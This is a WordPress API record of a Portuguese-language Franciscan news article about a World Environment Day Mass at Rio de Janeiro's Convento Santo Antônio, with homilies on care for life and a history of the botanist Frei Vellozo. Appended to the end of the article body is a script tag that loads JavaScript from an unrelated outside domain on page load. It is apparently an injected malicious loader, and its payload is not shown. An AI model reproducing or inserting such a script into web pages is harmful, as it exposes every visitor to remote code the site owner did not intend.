{"id":161798,"date":"2018-06-05T16:06:30","date_gmt":"2018-06-05T19:06:30","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=161798"},"modified":"2019-11-01T09:48:00","modified_gmt":"2019-11-01T12:48:00","slug":"a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html","title":{"rendered":"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_050618.jpg\" alt=\"trezena_050618\" width=\"830\" height=\"623\" \/><\/p>\n<p><strong>Moacir Beggo<\/strong><\/p>\n<p><strong>\u00a0<\/strong><strong>Rio de Janeiro (RJ)<\/strong> &#8211; Neste 5 de junho, Dia Mundial do Meio Ambiente, a Trezena de Santo Ant\u00f4nio do Largo da Carioca (RJ) trouxe para a reflex\u00e3o um tema muito caro e precioso para o franciscano Santo Ant\u00f4nio e todos os filhos de S\u00e3o Francisco de Assis: &#8220;O cuidado pela vida&#8221;. Em todas as Celebra\u00e7\u00f5es Eucar\u00edsticas desta manh\u00e3 de ter\u00e7a-feira &#8211; um dia muito movimentado no Convento Santo Ant\u00f4nio pela tradi\u00e7\u00e3o da devo\u00e7\u00e3o ao santo nas ter\u00e7as-feiras -, falou-se muito do cuidado pela vida, e a terceira franciscana, Moema Miranda, lembrou que na modernidade acostumamos, infelizmente, a dissociar o ser humano da natureza. &#8220;N\u00f3s hoje sabemos que tudo \u00e9 vivo. Que tudo tem vida e que n\u00f3s podemos e somos chamados a participar desse mundo criado com um amor incondicional pelo Pai&#8221;, pregou.<\/p>\n<p>Na Celebra\u00e7\u00e3o Eucar\u00edstica do meio-dia, a primeira com a devo\u00e7\u00e3o da Trezena, Frei Cid Tadeu Passos foi o presidente tendo como concelebrante o guardi\u00e3o e reitor do Convento, Frei Jos\u00e9 Pereira. Moema Miranda fez a leitura b\u00edblica. E dentro desta celebra\u00e7\u00e3o do Meio Ambiente, Frei Roger Brun\u00f3rio lembrou mais alguns fatos hist\u00f3ricos do Convento Santo Ant\u00f4nio, como um ilustre morador desta casa, o Pai da Bot\u00e2nica Brasileira, Frei Jos\u00e9 Mariano da Concei\u00e7\u00e3o Vellozo. Ontem, o Convento celebrou 410 anos de funda\u00e7\u00e3o.<\/p>\n<p>Como era de se esperar, a igreja do Convento lotou para esta Celebra\u00e7\u00e3o, a primeira de Frei Cid neste templo. &#8220;N\u00f3s amamos muito este lugar e a cada um de voc\u00eas&#8221;, confessou. Para o celebrante, nossa sociedade, hoje, tem todos os meios sofisticados para se comunicar mas falta o principal: amor. &#8220;E como falta o compromisso com a vida!&#8221;, disse, lamentando a banaliza\u00e7\u00e3o que se tornou a vida.\u00a0 &#8220;Desde que estou em Nil\u00f3polis (RJ) como vig\u00e1rio, j\u00e1 celebrei umas 40 missas de jovens que foram assassinados. Voc\u00ea imagina uma m\u00e3e chegando para a Missa de 7\u00ba dia de seu filho? Ela vem carregada e destro\u00e7ada&#8221;, disse, citando a destrui\u00e7\u00e3o com nosso o nosso planeta, com os nossos rios, cidades.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_050618_2.jpg\" alt=\"trezena_050618_2\" width=\"830\" height=\"441\" \/><\/p>\n<p>Segundo Frei Cid, hoje vivemos ref\u00e9ns da viol\u00eancia. &#8220;Na nossa Par\u00f3quia as reuni\u00f5es n\u00e3o podem passar das 9 horas da noite. Todos precisam estar em casa&#8221;, acrescentou.<\/p>\n<p>Segundo o frade, falta respeito e toler\u00e2ncia. &#8220;\u00c9 um ego\u00edsmo muito grande que impera. Ser\u00e1 que \u00e9 isso que Deus quer de n\u00f3s?&#8221;, perguntou. &#8220;Hoje, a exemplo de Santo Ant\u00f4nio, temos de buscar o fortalecimento de nossa espiritualidade, o fortalecimento da nossa ora\u00e7\u00e3o. Mas nossa ora\u00e7\u00e3o tem que se transformar em testemunho de vida, para que a gente possa saber cuidar uns dos outros&#8221;, ensinou.<\/p>\n<p>&#8220;Vamos pedir a esse santo e confrade querido que aben\u00e7oe o povo brasileiro. Eu tenho orgulho de ser brasileiro. Aconte\u00e7a o que acontecer, eu nasci aqui! \u00c9 a minha terra. E se Deus quiser n\u00f3s vamos vencer, vamos atravessar essa crise. E vamos sair vitoriosos pela gra\u00e7a desse Deus, porque sou cat\u00f3lico e crist\u00e3o, porque trago a esperan\u00e7a no cora\u00e7\u00e3o, como \u00e9 a marca de Santo Ant\u00f4nio&#8221;, animou.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_050618_3.jpg\" alt=\"trezena_050618_3\" width=\"830\" height=\"555\" \/><\/p>\n<p><strong>UM MUNDO PLENO DA CRIA\u00c7\u00c3O DE DEUS<\/strong><\/p>\n<p>Moema Miranda, ministra da Fraternidade da OFS Santo Ant\u00f4nio do Largo da Carioca e nomeada no ano passado assessora no Grupo de Trabalho para as Quest\u00f5es da Minera\u00e7\u00e3o da CNBB, como boa franciscana v\u00ea motivos para comemorar este Dia Mundial do Meio Ambiente. &#8220;Acho que hoje, mais do que nunca, compreendemos que menos o meio ambiente e mais o mundo em comum unifica humanos e tudo o que foi criado. N\u00f3s, na modernidade, acostumamos a pensar assim: &#8216;N\u00f3s somos os humanos e l\u00e1 est\u00e1 a natureza&#8217;. Se se perguntar onde est\u00e1 a natureza, voc\u00ea vai mostrar l\u00e1 embaixo&#8230; \u00a0Tem uma \u00e1rvore l\u00e1 e l\u00e1 tem natureza, como se n\u00f3s n\u00e3o f\u00f4ssemos natureza, n\u00e3o \u00e9? A\u00ed n\u00f3s pensamos tamb\u00e9m que existe um meio ambiente que est\u00e1 do lado de l\u00e1&#8230; \u00a0Hoje, sabemos que tudo \u00e9 vivo, que tudo tem vida e que n\u00f3s podemos e somos chamados a participar desse mundo criado com um amor incondicional pelo Pai&#8221;, enfatiza a tamb\u00e9m \u00e9 diretora do Instituto Brasileiro de An\u00e1lises Sociais.<\/p>\n<p>Para Moema, mais do que simplesmente seres humanos como a quinta ess\u00eancia da cria\u00e7\u00e3o, e muito mais como irm\u00e3os na Fraternidade Universal, Francisco de Assis compreendeu essa mensagem andando descal\u00e7o no ch\u00e3o da estrada, saindo de dentro do muro protegido de Assis. &#8220;E o Papa Francisco tomou essa mensagem como cora\u00e7\u00e3o mesmo da Enc\u00edclica <em>Laudato Si\u2019<\/em>. \u00a0Veja que coisa importante: a primeira Enc\u00edclica da Igreja, do alt\u00edssimo escal\u00e3o da Igreja, escrita sobre o mundo que n\u00f3s vivemos na sua complexidade, na sua combina\u00e7\u00e3o, tanto de mazelas quanto de possibilidades. Essa enc\u00edclica que come\u00e7a dizendo &#8220;a terra e os pobres clamam&#8221;. Ent\u00e3o, a terra fala, a terra n\u00e3o \u00e9 s\u00f3 o lugar onde n\u00f3s estamos. Ela \u00e9 um agente tamb\u00e9m de salva\u00e7\u00e3o, de express\u00e3o da cria\u00e7\u00e3o de Deus. O centro dessa mensagem da <em>Laudato S\u00ed<\/em> \u00e9 a mensagem franciscana da <em>Laudato Si\u2019<\/em> da Fraternidade Universal. Ent\u00e3o nesse dia, n\u00f3s, franciscanos, temos que renovar a convic\u00e7\u00e3o do nosso carisma, a for\u00e7a do nosso carisma para esse compromisso de como reencontrar o nosso lugar na comunidade da vida. Voltar a participar da comunidade da vida como irm\u00e3os, como irm\u00e3s, como fraternos. Voltarmos a perguntar qual \u00e9 a sabedoria que existe nesse todo criado e onde \u00e9 que mais nos integramos, n\u00f3s nos fazemos parte. E a\u00ed n\u00e3o vai ter mais um meio ambiente partido, n\u00f3s vamos ter um ambiente inteiro, um mundo pleno da cria\u00e7\u00e3o de Deus, do qual n\u00f3s somos convidados a participar&#8221;, proclamou.<\/p>\n<p><strong>O PAI DA BOT\u00c2NICA<\/strong><\/p>\n<p><img loading=\"lazy\" class=\"alignright size-full wp-image-161802\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_050618_5.jpg\" alt=\"trezena_050618_5\" width=\"232\" height=\"280\" \/>Entre os naturalistas brasileiros que se empenharam no estudo de nossa flora, Frei Jos\u00e9 Mariano da Concei\u00e7\u00e3o Vellozo ocupa um lugar de destaque pela sua obra monumental intitulada &#8220;Flora Fluminensis&#8221;, terminada em 1790. Frei Vellozo nasceu em 1741, na ent\u00e3o Prov\u00edncia de Minas Gerais, na freguesia de Santo Ant\u00f4nio da Vila de S\u00e3o Jos\u00e9, Bispado de Mariana.<\/p>\n<p><img loading=\"lazy\" class=\"alignleft wp-image-161804 \" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/trezena_050618_6.jpg\" alt=\"trezena_050618_6\" width=\"217\" height=\"201\" \/>Naturalista por voca\u00e7\u00e3o, transformou sua cela num gabinete de estudos. No ano de 1779 veio governar o Brasil, na qualidade de vice-rei, um portugu\u00eas distinto, chamado Luiz de Vasconcellos e Souza. Tendo not\u00edcias da predile\u00e7\u00e3o e do raro talento de Frei Vellozo pelas ci\u00eancias naturais, principalmente pela bot\u00e2nica, pediu ao ent\u00e3o provincial Frei Jos\u00e9 dos Anjos Passos para que Frei Vellozo fizesse excurs\u00f5es em toda a Capitania do Rio de Janeiro e reunisse o resultado de suas pesquisas numa obra conjunta. Surge ent\u00e3o a fase mais importante da vida do ilustre frade naturalista.<\/p>\n<p>Consta a obra de Frei Vellozo de onze volumes em f\u00f3lio, com suas estampas originais executadas a tinta, juntamente com dois volumes manuscritos do texto. Depois de terminada a obra, seu autor foi apresent\u00e1-la \u00e0 Corte de Lisboa. A obra provocou a admira\u00e7\u00e3o de todos. Segundo Frei R\u00f3ger Brunorio, diretor do Departamento de Bens Culturais da Prov\u00edncia, somente a Prov\u00edncia, a Biblioteca Nacional e a Cole\u00e7\u00e3o Brasiliana t\u00eam onze volumes dessa obra. &#8220;Infelizmente, das mais de 5 mil pranchas originais, temos apenas 149, que fica guardada no Departamento de Bens Culturais da Prov\u00edncia&#8221;, explicou.<\/p>\n<p>\u00c0s 18 horas, a Trezena ser\u00e1 presidida pelo Cardeal D. Orani Tempesta.<script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Convento Santo Ant\u00f4nio do Largo da Carioca<\/p>\n","protected":false},"author":1,"featured_media":204291,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[401,864,389],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Convento Santo Ant\u00f4nio do Largo da Carioca\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-05T19:06:30+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-01T12:48:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_050618.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_050618.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_050618.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html\",\"name\":\"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#primaryimage\"},\"datePublished\":\"2018-06-05T19:06:30+00:00\",\"dateModified\":\"2019-11-01T12:48:00+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html","og_locale":"pt_BR","og_type":"article","og_title":"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio - Not\u00edcias - Franciscanos","og_description":"Convento Santo Ant\u00f4nio do Largo da Carioca","og_url":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-06-05T19:06:30+00:00","article_modified_time":"2019-11-01T12:48:00+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_050618.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_050618.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/trezena_050618.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html","name":"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#primaryimage"},"datePublished":"2018-06-05T19:06:30+00:00","dateModified":"2019-11-01T12:48:00+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/a-mensagem-franciscana-para-o-dia-mundial-do-meio-ambiente.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"A mensagem franciscana para o Dia Mundial do Meio Ambiente no Convento Santo Ant\u00f4nio"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/161798"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=161798"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/161798\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/204291"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=161798"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=161798"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=161798"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}